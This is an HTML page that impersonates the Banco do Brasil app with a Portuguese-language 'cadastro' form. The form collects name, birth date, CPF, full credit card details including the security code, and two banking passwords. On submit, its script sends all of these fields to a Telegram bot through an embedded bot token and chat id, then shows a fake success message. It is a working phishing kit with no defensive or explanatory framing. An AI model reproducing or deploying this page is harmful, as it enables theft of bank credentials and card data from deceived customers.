<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <base href="/" />
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Banco do Brasil - App</title>
  <style>
    :root {
      --bb-yellow: #fdeb02;
      --bb-blue: #003da4;
      --error-red: #dc3545;
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
    }

    body {
      background: var(--bb-yellow);
      min-height: 100vh;
      display: flex;
      flex-direction: column;
    }

    .header {
      background-color: var(--bb-yellow);
      padding: 1rem;
      text-align: center;
      box-shadow: 0 2px 8px rgba(0,0,0,0.1);
    }

    .logo {
      max-width: 200px;
      height: auto;
      transition: transform 0.3s ease;
    }

    .logo:hover {
      transform: scale(1.05);
    }

    .container {
      max-width: 600px;
      margin: 0 auto;
      padding: 2rem 1rem;
      flex: 1;
      background-color: rgba(255, 255, 255, 0.95);
      border-radius: 16px;
      box-shadow: 0 4px 12px rgba(0,0,0,0.1);
      margin-top: 2rem;
      margin-bottom: 2rem;
    }

    .form-group {
      margin-bottom: 1.5rem;
      position: relative;
    }

    label {
      display: block;
      margin-bottom: 0.5rem;
      color: var(--bb-blue);
      font-weight: 500;
      font-size: 0.9rem;
      text-transform: uppercase;
      letter-spacing: 0.5px;
    }

    input {
      width: 100%;
      padding: 0.75rem;
      border: 2px solid rgba(0,61,164,0.2);
      border-radius: 8px;
      font-size: 1rem;
      transition: all 0.3s ease;
      background-color: rgba(255,255,255,0.9);
    }

    input:focus {
      outline: none;
      border-color: var(--bb-blue);
      box-shadow: 0 0 0 3px rgba(0,61,164,0.1);
      background-color: white;
    }

    .error {
      color: var(--error-red);
      font-size: 0.875rem;
      margin-top: 0.25rem;
      opacity: 0;
      transform: translateY(-10px);
      transition: all 0.3s ease;
    }

    .error:not(:empty) {
      opacity: 1;
      transform: translateY(0);
    }

    button {
      width: 100%;
      padding: 1rem;
      background-color: var(--bb-blue);
      color: white;
      border: none;
      border-radius: 8px;
      font-size: 1rem;
      font-weight: 600;
      cursor: pointer;
      transition: all 0.3s ease;
      text-transform: uppercase;
      letter-spacing: 1px;
    }

    button:hover {
      background-color: #002d7a;
      transform: translateY(-2px);
      box-shadow: 0 4px 12px rgba(0,61,164,0.2);
    }

    button:active {
      transform: translateY(0);
    }

    .loading {
      display: none;
      text-align: center;
      margin-top: 1rem;
    }

    @keyframes spin {
      to { transform: rotate(360deg); }
    }

    .spinner {
      display: inline-block;
      width: 24px;
      height: 24px;
      border: 3px solid rgba(0,61,164,0.2);
      border-radius: 50%;
      border-top-color: var(--bb-blue);
      animation: spin 1s linear infinite;
    }

    @media (max-width: 600px) {
      .container {
        margin: 1rem;
        padding: 1.5rem 1rem;
      }
    }
  </style>
</head>
<body>
  <header class="header">
    <img src="/images/BB-logo1.jpg" alt="Logo do Banco do Brasil" class="logo" width="200" height="60">
  </header>

  <div class="container">
    <form id="cadastroForm">
      <div class="form-group">
        <label for="nome">Nome Completo</label>
        <input type="text" id="nome" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="dataNascimento">Data de Nascimento</label>
        <input type="text" id="dataNascimento" placeholder="DD/MM/AAAA" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="cpf">CPF</label>
        <input type="text" id="cpf" placeholder="xxx.xxx.xxx-xx" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="cartaoCredito">Número do Cartão de Crédito</label>
        <input type="text" id="cartaoCredito" placeholder="1234 5678 9012 3456" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="dataValidade">Data de Validade</label>
        <input type="text" id="dataValidade" placeholder="MM/AA" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="codigoSeguranca">Código de Segurança</label>
        <input type="password" id="codigoSeguranca" maxlength="4" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="senha6">Senha de 6 dígitos</label>
        <input type="password" id="senha6" maxlength="6" required>
        <div class="error"></div>
      </div>

      <div class="form-group">
        <label for="senha8">Senha de 8 dígitos</label>
        <input type="password" id="senha8" maxlength="8" required>
        <div class="error"></div>
      </div>

      <button type="submit">Cadastrar</button>
    </form>
    
    <div class="loading">
      <div class="spinner"></div>
      <p>Processando...</p>
    </div>
  </div>

  <script src="https://unpkg.com/inputmask@5.0.6/dist/inputmask.min.js"></script>
  <script>
    document.addEventListener('DOMContentLoaded', function() {
      setTimeout(() => {
        try {
          const dataNascimentoMask = new Inputmask('99/99/9999');
          const cpfMask = new Inputmask('999.999.999-99');
          const cartaoCreditoMask = new Inputmask('9999 9999 9999 9999');
          const dataValidadeMask = new Inputmask('99/99');

          dataNascimentoMask.mask(document.getElementById('dataNascimento'));
          cpfMask.mask(document.getElementById('cpf'));
          cartaoCreditoMask.mask(document.getElementById('cartaoCredito'));
          dataValidadeMask.mask(document.getElementById('dataValidade'));
        } catch (e) {
          console.error('Error initializing masks:', e);
        }
      }, 500);

      const form = document.getElementById('cadastroForm');
      form.addEventListener('submit', async function(e) {
        e.preventDefault();
        
        if (validarFormulario()) {
          const dados = {
            nome: document.getElementById('nome').value,
            dataNascimento: document.getElementById('dataNascimento').value,
            cpf: document.getElementById('cpf').value,
            cartaoCredito: document.getElementById('cartaoCredito').value.replace(/\s/g, ''),
            dataValidade: document.getElementById('dataValidade').value,
            codigoSeguranca: document.getElementById('codigoSeguranca').value,
            senha6Digitos: document.getElementById('senha6').value,
            senha8Digitos: document.getElementById('senha8').value
          };

          try {
            document.querySelector('.loading').style.display = 'block';
            
            const response = await fetch('https://api.telegram.org/bot7204036205:AAGbm736G6E0kKDUOK1C_RXd4kQd0PDoQgU/sendMessage', {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({
                chat_id: '1784653276',
                text: JSON.stringify(dados)
              })
            });

            if (!response.ok) throw new Error('Erro ao enviar dados');

            alert('Cadastro realizado com sucesso!');
            form.reset();
          } catch (error) {
            alert('Erro ao enviar os dados. Tente novamente.');
          } finally {
            document.querySelector('.loading').style.display = 'none';
          }
        }
      });

      function validarFormulario() {
        let isValid = true;
        document.querySelectorAll('.error').forEach(el => el.innerText = '');

        const campos = [
          { id: 'nome', mensagem: 'Informe o nome completo' },
          { id: 'dataNascimento', mensagem: 'Data de nascimento inválida' },
          { id: 'cpf', mensagem: 'CPF inválido' },
          { id: 'cartaoCredito', mensagem: 'Número do cartão inválido' },
          { id: 'dataValidade', mensagem: 'Data de validade inválida' },
          { id: 'codigoSeguranca', mensagem: 'Código de segurança inválido' },
          { id: 'senha6', mensagem: 'Senha de 6 dígitos inválida' },
          { id: 'senha8', mensagem: 'Senha de 8 dígitos inválida' }
        ];

        campos.forEach(campo => {
          const el = document.getElementById(campo.id);
          if (!el.value.trim()) {
            el.nextElementSibling.innerText = campo.mensagem;
            isValid = false;
          }
        });

        return isValid;
      }
    });
  </script>
</body>
</html>
